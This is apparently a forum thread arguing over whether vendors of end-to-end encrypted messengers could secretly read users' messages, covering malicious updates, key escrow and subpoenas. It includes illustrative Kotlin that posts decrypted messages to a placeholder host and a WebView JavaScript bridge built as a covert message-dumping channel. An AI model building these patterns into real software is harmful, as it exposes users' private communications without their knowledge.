
IMO the difference is mostly theoretical anyway. Despite the fancy HSMs and end-to-end encryption, if Signal or WhatsApp wanted to read your messages they trivially could: just push an app update that quietly sends all of your messages to them.

It's riskier in terms of getting caught, but probably not hugely so if you do it in a way that preserves plausible deniability.

I think you pretty much have to trust the app supplier. Which in this case, I do not.
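
To make the threat concrete, here is a minimal sketch of that attack in Kotlin. Everything in it is invented for illustration (the endpoint, the assumption that decrypted messages sit in a list); the point is just that E2E encryption ends the moment the app decrypts, and the app can do whatever it likes with the plaintext:

    import java.net.HttpURLConnection
    import java.net.URL

    // Hypothetical sketch only: a compromised app build forwarding
    // messages *after* E2E decryption. The URL is made up.
    fun exfiltrate(plaintextMessages: List<String>) {
        val conn = URL("https://updates.example.com/telemetry")
            .openConnection() as HttpURLConnection
        conn.requestMethod = "POST"
        conn.doOutput = true
        conn.outputStream.use {
            it.write(plaintextMessages.joinToString("\n").toByteArray())
        }
        conn.inputStream.close()
    }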



Pushing a malicious app update creates an inspectable artifact. Researchers can discover exactly when it happened, and therefore who was vulnerable and which messages were exposed.

This is a much much much better situation than handing someone your keys and letting them MITM you at any time with no hope of knowing.
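
And that inspectability is concrete: anyone holding the shipped binary can hash it and compare against copies that other users or archives kept. A rough sketch (the file names are hypothetical):

    import java.io.File
    import java.security.MessageDigest

    // Hash an app binary so independent copies can be compared.
    fun sha256(path: String): String =
        MessageDigest.getInstance("SHA-256")
            .digest(File(path).readBytes())
            .joinToString("") { "%02x".format(it) }

    fun main() {
        // A mismatch, or a build only some users ever received, is
        // dateable evidence; a silently handed-over key leaves nothing
        // to compare.
        val shipped = sha256("app-7.42.1-from-my-phone.apk")
        val archived = sha256("app-7.42.1-from-archive.apk")
        println(if (shipped == archived) "builds match" else "divergent build!")
    }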


You're not thinking sneakily enough. Obviously you wouldn't push a visibly malicious app update to everyone. Instead you make it so that you can push malicious code to specific users. Then all researchers can say is "it's a bit suspicious that this webview has access to Java APIs" and you just need to say "it's needed so we can get your app version" or whatever. They'll never be able to actually see you reading the messages, unless you happen to be very stupid and target a security researcher.
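
Concretely, on Android this is just WebView.addJavascriptInterface, which is a real API. The bridge class, method names, and URL below are made up, but the mechanism is exactly the "webview with access to Java APIs" scenario: a server-controlled page that serves benign JS to everyone and something else to a targeted user.

    import android.webkit.JavascriptInterface
    import android.webkit.WebView

    // Only @JavascriptInterface-annotated methods are callable from page JS.
    class AppBridge(private val readMessages: () -> String) {
        @JavascriptInterface
        fun appVersion(): String = "7.42.1"          // the plausible cover story

        @JavascriptInterface
        fun dumpMessages(): String = readMessages()  // what a targeted payload would call
    }

    fun attach(webView: WebView, readMessages: () -> String) {
        webView.settings.javaScriptEnabled = true
        webView.addJavascriptInterface(AppBridge(readMessages), "Native")
        // The page is server-controlled: it can serve benign JS to
        // everyone and JS that calls Native.dumpMessages() only to
        // selected users.
        webView.loadUrl("https://example.com/inapp")
    }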

I agree it's definitely better to do proper e2e encryption like WhatsApp / Signal do, but I don't think we should pretend they are magically fully secure against this attack.


Apple doesn’t allow it?


As far as I know they do. You aren't allowed to dynamically load binary code but there's nothing against scripting or using JS in webviews.


IANAL but the difference seems to be gigantic. If the secret key is stored on a company server, then that company can be subpoenaed for it. If it's not on the company's server, the client's endpoint has to be compromised (e.g. by a police raid or by electronic surveillance). The former is much easier than the latter. I don't think government authorities can force companies to actively eavesdrop on their clients by pushing malware through their update mechanism to a client's device, at least not officially in non-authoritarian countries with due process.
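
As a sketch of why that distinction matters: with client-side key generation, only the public key ever touches the company's servers, so there is nothing useful to subpoena there. A toy version (real messengers layer prekeys, ratchets, etc. on top; the upload step is hypothetical):

    import java.security.KeyPairGenerator
    import java.util.Base64

    fun main() {
        // Generate the keypair on the device; P-256 via the platform provider.
        val keyPair = KeyPairGenerator.getInstance("EC")
            .apply { initialize(256) }
            .generateKeyPair()

        // Only this leaves the device (the upload itself is hypothetical).
        val uploadable = Base64.getEncoder().encodeToString(keyPair.public.encoded)
        println("public key for the server: $uploadable")

        // keyPair.private never crosses the wire, so a subpoena to the
        // company yields nothing; an attacker has to compromise this
        // endpoint instead.
    }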


>If it's not on the company's server

If. Just recently there was news about Meta brute-forcing localhost on all of its users' devices to hack them (https://localmess.github.io/). And now someone seriously suggests we believe that Meta does not collect private keys on its servers?

Moreover, I think corporations no longer even have the option not to take keys from users: either you have their keys or you go to jail. And if you have the keys but users believe you don't and trust you with all their secrets, that's even better.

And if you think government authorities can't do something like that, look at what happened to Alexey Pertsev. A criminal uses your tool to protect their privacy? You're going to jail. So in today's world it's better to have the keys on your server even if you never intend to use them, because at some point you might be asked for them, and refusing (or not having them) will mean jail time.


> I don't think government authorities can force companies to actively eavesdrop on their clients by pushing malware through their update mechanism to a client's device, at least not officially in non-authoritarian countries with due process.

Yeah, unfortunately that list no longer includes countries like the UK and Australia.



